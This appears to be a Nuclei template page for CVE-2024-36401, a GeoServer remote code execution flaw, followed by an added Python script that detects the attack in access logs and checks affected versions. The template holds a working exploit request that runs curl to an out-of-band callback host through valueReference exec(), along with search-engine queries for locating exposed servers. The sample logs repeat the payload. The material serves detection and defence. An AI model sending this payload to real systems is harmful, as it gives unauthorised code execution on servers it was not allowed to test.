GeoServer RCE in Evaluating Property Name Expressions
ID: CVE-2024-36401
Severity: critical
Author: DhiyaneshDk,ryanborum
Tags: cve,cve2024,geoserver,rce,unauth,kev
Description
In GeoServer versions prior to 2.25.1, 2.24.3 and 2.23.5, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation, because property names are unsafely evaluated as XPath expressions.
YAML Source

```yaml
id: CVE-2024-36401

info:
  name: GeoServer RCE in Evaluating Property Name Expressions
  author: DhiyaneshDk,ryanborum
  severity: critical
  description: |
    In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.
  impact: |
    This vulnerability can lead to executing arbitrary code.
  reference:
    - https://x.com/sirifu4k1/status/1808270303275241607
    - https://nvd.nist.gov/vuln/detail/CVE-2024-36401
    - https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401
    - https://github.com/advisories/GHSA-6jj6-gm7p-fcvv
  metadata:
    verified: true
    max-request: 1
    vendor: osgeo
    product: geoserver
    shodan-query: "Server: GeoHttpServer"
    fofa-query:
      - title="geoserver"
      - app="geoserver"
    google-query: intitle:"geoserver"
  tags: cve,cve2024,geoserver,rce,unauth,kev

flow: |
  if(http(1)) {
    set("name",template.typename[0])
    http(2)
  }

http:
  - raw:
      - |
        GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    extractors:
      - type: regex
        name: typename
        part: body
        group: 1
        regex:
          - typeName=([^&\]]+)
        internal: true

  - raw:
      - |
        @timeout 20s
        GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames={{name}}&valueReference=exec(java.lang.Runtime.getRuntime(),'curl+{{interactsh-url}}') HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: content_type
        words:
          - "application/xml"
# digest: 4a0a00473045022100cb6c0cb42d1e00af308b4aad26132048427911f01c602976e63e570a9c54d5cb02200dde74e6aa864012ddd86c5cf0f905749e3371a9efca16994ae0f98ab2e52ff2:922c64590222798bb761d5b6d8e72950
```

Guide to check the vulnerabilities
This template detects the vulnerability in web applications. Run it with the Nuclei tool to scan a target for the specific request and response behaviour it describes:

```shell
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-36401.yaml"
```
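As an added example (not part of the template above or of the Nuclei project), a small Python checker a defender can run on their own side: it flags `/geoserver/` requests in access logs whose `valueReference` (or, assumed here to be among the "multiple parameters", `propertyName`) carries a function call instead of a plain property name, and reports whether a GeoServer version string falls inside the affected ranges from the description. The log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# OGC parameters that vulnerable GeoServer builds evaluated as property-name
# expressions. valueReference is the one the template above sends; propertyName
# is included on the assumption that it is among the "multiple parameters".
PROPERTY_PARAMS = ("valuereference", "propertyname")

# A genuine property name is an element path such as topp:states/the_geom;
# a function call "(" or a Java class reference has no business there.
SUSPICIOUS = re.compile(r"\(|java\.", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def suspicious_property_refs(log_text):
    """Return (line_no, parameter, decoded value) for each /geoserver/ request
    whose property reference looks like an expression, not a property name."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = urlsplit(m.group(1))
        if not target.path.startswith("/geoserver/"):
            continue
        # parse_qs URL-decodes values; OGC parameter names are case-insensitive
        params = {k.lower(): v for k, v in parse_qs(target.query).items()}
        for name in PROPERTY_PARAMS:
            for value in params.get(name, []):
                if SUSPICIOUS.search(value):
                    hits.append((line_no, name, value))
    return hits


def is_affected(version):
    """True when a GeoServer version is below 2.23.5, 2.24.3 or 2.25.1 on its
    branch; branches before 2.23 are treated as affected, after 2.25 as fixed."""
    major, minor, patch = (int(p) for p in version.split(".")[:3])
    fixed_patch = {23: 5, 24: 3, 25: 1}
    if major != 2 or minor > 25:
        return False
    return True if minor < 23 else patch < fixed_patch[minor]


# Constructed sample access-log lines (not real traffic): a benign GetFeature,
# a GetPropertyValue carrying a function call, and the same call URL-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jul/2024:12:00:01 +0000] "GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetFeature&typeNames=topp:states HTTP/1.1" 200 5120
10.0.0.7 - - [10/Jul/2024:12:00:02 +0000] "GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=topp:states&valueReference=exec(java.lang.Runtime.getRuntime(),'PLACEHOLDER') HTTP/1.1" 200 310
10.0.0.9 - - [10/Jul/2024:12:00:03 +0000] "GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=topp:states&valueReference=exec%28java.lang.Runtime.getRuntime%28%29%2C%27PLACEHOLDER%27%29 HTTP/1.1" 200 310
"""
```

Calling `suspicious_property_refs(SAMPLE_LOG)` flags log lines 2 and 3 with the same decoded value, while the GetFeature request on line 1 passes.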